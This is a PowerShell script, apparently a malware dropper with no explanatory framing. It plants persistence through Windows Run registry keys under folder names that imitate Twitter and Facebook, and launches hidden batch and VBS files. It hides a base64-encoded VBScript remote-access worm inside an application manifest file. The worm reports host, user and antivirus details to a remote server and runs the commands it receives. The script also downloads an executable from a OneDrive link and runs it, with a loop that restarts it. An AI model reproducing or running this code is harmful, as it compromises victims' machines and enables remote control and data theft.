$OutPath = "C:\ProgramData\Twitter\log\"
if (-not (Test-Path  $OutPath ))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

start-sleep 5

$Content = @'

REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 3 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Facebook\System32\Microsoft\SystemData\Outlook.ps1"
'@
Set-Content -Path C:\Users\Public\22.bat -Value $Content

$Content = @'
'Please open file form Your PC
'Please open file form Your PC
'Please open file form Your PC
set WshShell = wscript.createobject("WScript.shell")
'Please open file form Your PC
WshShell.run """C:\Users\Public\22.bat"" ", 0, true
'Please open file form Your PC
Set WshShell = Nothing
'Please open file form Your PC
'@
Set-Content -Path C:\Users\Public\22.vbs -Value $Content
start-sleep 10
start C:\Users\Public\22.vbs


$Content = @'

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
<!--BEGIN_VBSEDIT_DATA
PHJvb3Q+DQo8dGltZW91dD4wPC90aW1lb3V0Pg0KPHNjcmlwdG5hbWU+VW50aXRs
ZWQudmJzPC9zY3JpcHRuYW1lPg0KPGFwcG5hbWU+VW50aXRsZWQ8L2FwcG5hbWU+
DQo8c2NyaXB0PicgQ29kZWQgYnkgdl9CMDENCk9uIGVycm9yIHJlc3VtZSBuZXh0
DQoNCmogPSBhcnJheSgiV1NjcmlwdC5TaGVsbCIsIlNjcmlwdGluZy5GaWxlU3lz
dGVtT2JqZWN0IiwiU2hlbGwuQXBwbGljYXRpb24iLCJNaWNyb3NvZnQuWE1MSFRU
UCIpDQpnID0gYXJyYXkoIkhLQ1UiLCJIS0xNIiwiSEtDVVx2dzBybSIsIlxTb2Z0
d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW5cIiwiSEtM
TVxTT0ZUV0FSRVxDbGFzc2VzXCIsIlJFR19TWiIsIlxkZWZhdWx0aWNvblwiKQ0K
eT0gYXJyYXkoIndpbm1nbXRzOiIsIndpbjMyX2xvZ2ljYWxkaXNrIiwiV2luMzJf
T3BlcmF0aW5nU3lzdGVtIiwid2lubWdtdHM6XFxsb2NhbGhvc3Rccm9vdFxzZWN1
cml0eWNlbnRlciIsIkFudGlWaXJ1c1Byb2R1Y3QiKQ0KDQpmdW5jdGlvbiBnbyht
KQ0KaWYgbT00IHRoZW4NClQ9Indpbm1nbXRzOlxcbG9jYWxob3N0XHJvb3Rcc2Vj
dXJpdHljZW50ZXIiDQpTZXQgQj1HZXRPYmplY3QoeSgzKSkuSW5zdGFuY2VzT2Yo
eSg0KSkNCmZvciBlYWNoIGEgaW4gYg0KZ289YS5kaXNwbGF5TmFtZQ0KZXhpdCBm
b3INCm5leHQNClNldCBCPUdldE9iamVjdCh5KDMpICZhbXA7ICIyIikuSW5zdGFu
Y2VzT2YoeSg0KSkNCmZvciBlYWNoIGEgaW4gYg0KZ289YS5kaXNwbGF5TmFtZSAN
CmV4aXQgZm9yDQpuZXh0DQppZiBnbz0iIiB0aGVuIGdvPSJOb3QtZm91bmQiDQpl
bHNlDQpTZXQgQj1HZXRPYmplY3QoeSgwKSkuSW5zdGFuY2VzT2YoeShtKSkNCmZv
ciBlYWNoIGEgaW4gYg0KaWYgbSA9IDEgdGhlbg0KZ289YS52b2x1bWVzZXJpYWxu
dW1iZXINCmVsc2VpZiBtID0gMiB0aGVuDQpnbz1hLmNhcHRpb24NCmVuZCBpZg0K
ZXhpdCBmb3INCm5leHQNCmVuZCBpZg0KZW5kIGZ1bmN0aW9uIA0KDQpzZXQgdyA9
IFdTY3JpcHQNCnNldCBzaCA9IENyKDApDQpzZXQgZnMgPSBDcigxKQ0KDQpGdW5j
dGlvbiBDcihOKQ0KU2V0IENyID0gQ3JlYXRlT2JqZWN0KGooTikpDQpFbmQgRnVu
Y3Rpb24NCg0KZnVuY3Rpb24gRXgocykNCkV4ID0gc2guRXhwYW5kRW52aXJvbm1l
bnRTdHJpbmdzKCIlIiZhbXA7cyZhbXA7IiUiKQ0KZW5kIGZ1bmN0aW9uDQoNCmZ1
bmN0aW9uIFB0KEMsQSkNClB0PSIiDQpTZXQgWD1DcigzKQ0KWC5PcGVuICJQT1NU
IiwiaHR0cDovL2ludm9pY2UtdXBkYXRlLm15aXBob3N0LmNvbToxMTg4LyImYW1w
O0MsZmFsc2UNClguc2V0cmVxdWVzdGhlYWRlciAiVXNlci1BZ2VudDoiLG5mDQpY
LnNlbmQgQQ0KUHQ9WC5yZXNwb25zZXRleHQNCmVuZCBmdW5jdGlvbg0KDQpGdW5j
dGlvbiBuZg0KbmY9IiINCmk9Z28oMSkNCnM9Vk4gJmFtcDsgIl8iICZhbXA7IGkN
Cm5mPW5mJmFtcDtzJmFtcDtjDQpzPWV4KCJDT01QVVRFUk5BTUUiKQ0KbmY9bmYm
YW1wO3MmYW1wO2MNCnM9ZXgoIlVTRVJOQU1FIikNCm5mPW5mJmFtcDtzJmFtcDtj
DQpzPWdvKDIpDQpuZj1uZiZhbXA7cyZhbXA7Yw0Kcz1nbyg0KQ0KbmY9bmYmYW1w
O3MmYW1wO2MmYW1wO2MmYW1wO250JmFtcDtjJmFtcDt1JmFtcDtjDQpFbmQgRnVu
Y3Rpb24NCg0KDQoNCiclZmRyJQ0KDQoNCg0KDQoNCnZuPSJ2dzBybSINClU9IiIN
Cg0KY2ggPSBjaHJ3KDM0KQ0KYyA9IGNocncoOTIpDQpmdSA9IHcuc2NyaXB0ZnVs
bG5hbWUNCnduPXcuc2NyaXB0bmFtZQ0KTlQ9Ik5vIg0KaWYgZnMuZmlsZWV4aXN0
cyhleCgiV2luZGlyIikgJmFtcDsgIlxNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2
Mi4wLjUwNzI3XHZiYy5leGUiKSB0aGVuDQpOVD0iWWVzIg0KZW5kIGlmDQoNClU9
IHNoLnJlZ3JlYWQoZygyKSkNCmlmIFU9IiIgdGhlbg0KaWYgbWlkKGZ1LDIpPSI6
XCIgJmFtcDsgd24gdGhlbg0KVT0iVFJVRSINCnNoLnJlZ3dyaXRlIGcoMiksIFUs
IGcoNSkNCmVsc2UNClU9IkZBTFNFIg0Kc2gucmVnd3JpdGUgZygyKSwgVSwgZyg1
KQ0KZW5kIGlmDQplbmQgaWYNCg0KDQpzcGw9InxWfCINCndoaWxlIHRydWUNCnM9
c3BsaXQoUHQoIlZyZSIsIiIpLHNwbCkNCnNlbGVjdCBjYXNlIHMoMCkNCmNhc2Ug
ImV4YyINCnNhPSBzKDEpDQpleGVjdXRlIHNhDQpjYXNlICJTYyINCnMyID0gRXgo
InRlbXAiKSAmYW1wOyAiXCIgJmFtcDsgcygyKQ0Kc2V0IHdyID0gZnMuT3BlblRl
eHRGaWxlKHMyLDIsVHJ1ZSkNCndyLldyaXRlIHMoMSkNCndyLkNsb3NlKCkNCnNo
LnJ1biBzMiwgNg0KY2FzZSAiUkYiDQpzMiA9IEV4KCJ0ZW1wIikgJmFtcDsgIlwi
ICZhbXA7IHMoMikNCnNldCB3ciA9IGZzLk9wZW5UZXh0RmlsZShzMiwyLFRydWUp
DQp3ci5Xcml0ZSBzKDEpDQp3ci5DbG9zZSgpDQpzaC5ydW4gczINCmNhc2UgIlJl
biINCnNldCB3ciA9IGZzLk9wZW5UZXh0RmlsZShmdSwxKQ0KZiA9IHdyLlJlYWRB
bGwNCndyLmNsb3NlKCkNCmYgPSByZXBsYWNlKGYsY2gmYW1wO3ZuJmFtcDtjaCxj
aCZhbXA7cygxKSZhbXA7Y2gpDQpzZXQgd3IgPSBmcy5PcGVuVGV4dEZpbGUoZnUs
MixmYWxzZSkNCndyLldyaXRlIGYNCndyLmNsb3NlKCkNCmNhc2UgIlVwIg0Kc2V0
IHdyID0gZnMuT3BlblRleHRGaWxlKGZ1LDIsZmFsc2UpDQpzKDEpID0gcmVwbGFj
ZShzKDEpLCJ8VXwiLCJ8VnwiKQ0Kd3IuV3JpdGUgcygxKQ0Kd3IuQ2xvc2UoKQ0K
c2gucnVuICJ3c2NyaXB0LmV4ZSAvL0IgIiAmYW1wOyBjaCAmYW1wOyBmdSAmYW1w
OyBjaCwgNg0Kdy5xdWl0DQpjYXNlICJDbCINClcucXVpdCANCmNhc2UgIlVuIg0K
UygxKSA9IHJlcGxhY2UoUygxKSwiJWYiLGZ1KQ0KUygxKSA9IHJlcGxhY2UoUygx
KSwiJW4iLHduKQ0KUygxKSA9IHJlcGxhY2UoUygxKSwiJXNmZHIiLGRyKQ0KZXhl
Y3V0ZSBTKDEpDQp3LnF1aXQNCmVuZCBzZWxlY3QNClcuU2xlZXAgNjAwMA0KDQp3
ZW5kPC9zY3JpcHQ+DQo8cGlkPjFPZVo4WG5sY0tpYkxNdnFSd0pxdFU1d25qbGx5
YlNoSkVLRjVBUUhJcDAwUDFIVFNEbW82b3NRVjVMaGNrZEQ8L3BpZD4NCjxldmFs
dWF0aW9uPjVjNzA2OWZjZThmZGQ2M2ExZWE5ODEwNmEzZWM1MmY0MGUyNWQ3MTIy
MDljMzEyOWNkYjkwYTM1M2NkOThmZTBmMDQ0YmE1OTZkNjE3OGQ2OTEyNjQwYTgw
NTg1ZWQzZjM2OWJlZDc4OTBiOTU5YzZlMGIwNmIyZDQzODRlNWQ1MDYwYWNmNThm
MjUyMGI5YmU1NTk2NjcwYTMyNGZjZDgwODQzZDRjMDBjYTI4NmYyODY4MmFiMTcz
ZjI1MjIxMWRiZWU0MWE2NWFkZGNmNTEyZjA5NGViOTY3NDhhOWVkZTcwMzllMGIx
OGM4YTk0ZGQxOTkyOTU3NWJhMTFhMzdjOGJiMTZlOTcyZmUyZDJkYTFjYjk3ZjZm
MDIxMDE2OGZkNWM0MTIxN2UyOGVlM2E0OTE5NDEwOTk2ZTg0N2RmMTU0YjU4MjU3
NmZiNWFkNDwvZXZhbHVhdGlvbj4NCjwvcm9vdD4NCgA=
END_VBSEDIT_DATA-->



'@
Set-Content -Path C:\ProgramData\Twitter\log\Untitled.exe.manifest -Value $Content




$url = "https://onedrive.live.com/Download?cid=6BCBE135551869F2&resid=6BCBE135551869F2%21162&authkey=AKoUVA0wQIwWPYg" 
$path = "C:\ProgramData\Twitter\log\Untitled.exe" 
# param([string]$url, [string]$path) 

if(!(Split-Path -parent $path) -or !(Test-Path -pathType Container (Split-Path -parent $path))) { 
$targetFile = Join-Path $pwd (Split-Path -leaf $path) 
} 

(New-Object Net.WebClient).DownloadFile($url, $path) 
$path




start-sleep 5
$Content = @'
while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{
}
start C:\ProgramData\Twitter\log\Untitled.exe
}
start-sleep 60
}
'@
Set-Content -Path C:\ProgramData\Twitter\log\look.ps1 -Value $Content

start-sleep 5


powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\ProgramData\Twitter\log\look.ps1"










